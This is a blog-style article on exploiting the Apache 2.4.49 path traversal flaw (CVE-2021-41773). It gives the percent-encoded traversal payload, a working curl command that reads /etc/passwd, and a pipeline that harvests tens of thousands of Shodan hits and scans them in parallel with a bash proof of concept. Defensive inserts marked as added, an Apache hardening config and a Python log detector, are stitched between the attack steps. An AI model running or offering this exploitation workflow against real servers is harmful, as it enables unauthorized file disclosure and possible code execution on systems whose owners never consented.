Finding and Exploiting Path Traversal in Apache 2.4.49 HTTP Server [CVE-2021-41773]

On October 4th Apache disclosed a vulnerability introduced in Apache HTTP Server 2.4.49, tracked as CVE-2021-41773. At the same time Apache released a patch for it in version 2.4.50. The vulnerability allows an attacker to bypass the server's path traversal protection by percent-encoding the dots in the traversal sequence. The bypass looks like this:

.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

It is also possible to achieve RCE (remote code execution) if mod_cgi is enabled. Modern web technology no longer relies on it, but older websites built on older stacks still use this functionality. Exploitation is easy and can be done with curl alone. Let's see how to find websites running this Apache version. We will use our favorite search engine, shodan.io; this simple query finds potentially vulnerable Apache 2.4.49 HTTP servers:
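As an added, defender-side example (not from the article): Apache's advisory for this CVE notes that the traversal only reaches files outside the document root when those paths are not protected by `Require all denied`. The fragment below shows the permissive setting that leaves such a server exposed next to the hardened one, and notes that the RCE variant depends on mod_cgi. The two `<Directory />` blocks are alternatives for comparison, not one config file, and the paths are assumed.

```apache
# WEAK (assumed illustration, not a shipped default): granting access to the
# filesystem root means a traversal that escapes DocumentRoot can read
# /etc/passwd on an unpatched 2.4.49.
<Directory />
    Require all granted
</Directory>

# HARDENED: deny the filesystem root, then grant only the DocumentRoot.
# With this in place the encoded traversal request is denied even on 2.4.49;
# upgrading to 2.4.50 or later is still required.
<Directory />
    AllowOverride None
    Require all denied
</Directory>

<Directory "/var/www/html">
    Require all granted
</Directory>

# The RCE variant needs mod_cgi. If no CGI scripts are served, keep the module
# unloaded (Debian-style: a2dismod cgi) and drop the ScriptAlias for /cgi-bin/.
```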

"Apache/2.4.49"

We got 78,219 results. Those servers run Apache 2.4.49, but not all of them are vulnerable, so we need to filter out the vulnerable ones. We can do that with bash by combining our script with the exploit. The curl exploit looked like this:

curl --silent --path-as-is --insecure -k "target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

This only exploits the server and shows us the contents of /etc/passwd. Let's build a detection script around it.
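The article's poc.sh probes servers from the outside; the complementary check on the defending side is to spot these requests in the Apache access log. The following is an added example, not the author's script: it parses combined-format log lines (constructed below, not real traffic), percent-decodes the request path repeatedly (so double encoding like %252e is caught as well), and flags any path whose decoded form climbs above the web root. The log format regex and the sample lines are assumptions for the demo.

```python
"""Flag CVE-2021-41773-style encoded traversal in Apache access logs."""
import re
from urllib.parse import unquote

# Combined log format: client - - [date] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic); the last one is a harmless
# relative path that a naive '..' grep would wrongly flag.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043
203.0.113.9 - - [05/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1824
203.0.113.9 - - [05/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 55
198.51.100.7 - - [05/Oct/2021:10:00:04 +0000] "GET /images/../index.html HTTP/1.1" 200 1043
"""


def decode_path(raw):
    """Drop the query string and percent-decode until the value stops changing.

    Decoding to a fixed point is what Apache 2.4.49 failed to do before its
    '..' check; repeating it also catches double-encoded %252e sequences."""
    path = raw.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_root(path):
    """True if the decoded path climbs above '/' at any point.

    Walk the segments with a depth counter: '..' goes up one level, a normal
    segment goes down one; '.' and empty segments are neutral."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def classify(raw_path):
    """Return 'ok', 'traversal-plain' or 'traversal-encoded' for one request path."""
    stripped = raw_path.split("?", 1)[0]
    decoded = decode_path(raw_path)
    if escapes_root(decoded):
        return "traversal-encoded" if decoded != stripped else "traversal-plain"
    return "ok"


def scan_log(text):
    """Return (ip, method, decoded_path, verdict) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group("path"))
        if verdict != "ok":
            findings.append((m.group("ip"), m.group("method"),
                             decode_path(m.group("path")), verdict))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged line means the traversal was served and the host needs the 2.4.50 upgrade plus a review of what was read; a 403 on the same request is what a correctly restricted filesystem root returns.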

Now let's download the results from Shodan. But our script takes one argument at a time; how can we feed it multiple inputs?

We can extract the IPs from the downloaded result using a regex.

cat aa4dfdb4-faba-43a1-8784-9cce0c8f46e9.json | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'| tee -a ip.txt

We stored all the IPs in ip.txt; now let's scan them for the vulnerability using our bash script and xargs.

cat ip.txt | xargs -n1 -P10 bash poc.sh | tee -a results.txt

We can use httprobe to detect whether a target speaks HTTP or HTTPS.

For bug hunters: you can use the same process with all the subdomains you have collected.

cat subdomains.txt | httprobe | xargs -n1 -P10 bash poc.sh | tee -a result.txt

[This article is for educational and research purposes only; we do not promote harming others' property without permission.]

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

Joy Ghosh